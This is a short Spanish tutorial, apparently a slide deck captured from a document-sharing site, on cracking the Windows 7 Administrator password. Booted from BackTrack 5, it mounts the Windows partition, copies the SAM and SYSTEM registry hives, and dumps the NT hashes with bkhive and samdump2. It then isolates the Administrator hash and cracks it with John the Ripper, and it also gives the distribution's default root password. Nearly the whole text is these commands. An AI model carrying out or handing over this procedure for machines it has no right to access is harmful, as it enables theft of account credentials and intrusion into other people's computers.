2-Romper Password Windows 7
-
Upload
alejandro-perez -
Category
Documents
-
view
217 -
download
0
Transcript of 2-Romper Password Windows 7
5/13/2018 2-Romper Password Windows 7 - slidepdf.com
http://slidepdf.com/reader/full/2-romper-password-windows-7 1/3
Para este ejemplo vamos a utilizar la distribución de Linux Back-Track-5 en modo texto como
root todo el rato para romper la password de Administrador de Windows 7.
Para acceder al entorno gráfico se puede ejecutar el comando startx y la password de root es
toor
Lo primero interesa saber que tipo de particionado tiene el equipo.
fdisk -l
Si hay dudas se pueden montar todas las particiones necesarias y averiguar por el contenido
en cual está el sistema operativo Windows7. Supongamos que está en la segunda partición.
Antes habría que haber creado un directorio donde se habría montado la partición.
mkdir /mnt/sda2
mount -t ntfs /dev/sda2 /mnt/sda2
Acceder al directorio de configuración
cd /mnt/sda2/Windows/System32/config/
Copiar los ficheros SYSTEM y SAM en el directorio home de root.
cp SYSTEM /root/.
cp SAM /root/.
Cambiar al directorio en el que se han copiado los ficheros
cd
Ejecutar los comandos bkhive y samdump2
bkhive SYSTEM /root/key
samdump2 SAM /root/key > /root/list
Dejar en un fichero la password del administrador encriptada
cat /root/list | grep Admin > /root/pwAdmin
Acceder al directorio del ejecutable de john
cd /pentest/passwords/john/
Ejecutar john para adivinar la password del administrador
./john --format=NT /root/pwAdmin
5/13/2018 2-Romper Password Windows 7 - slidepdf.com
http://slidepdf.com/reader/full/2-romper-password-windows-7 2/3
5/13/2018 2-Romper Password Windows 7 - slidepdf.com
http://slidepdf.com/reader/full/2-romper-password-windows-7 3/3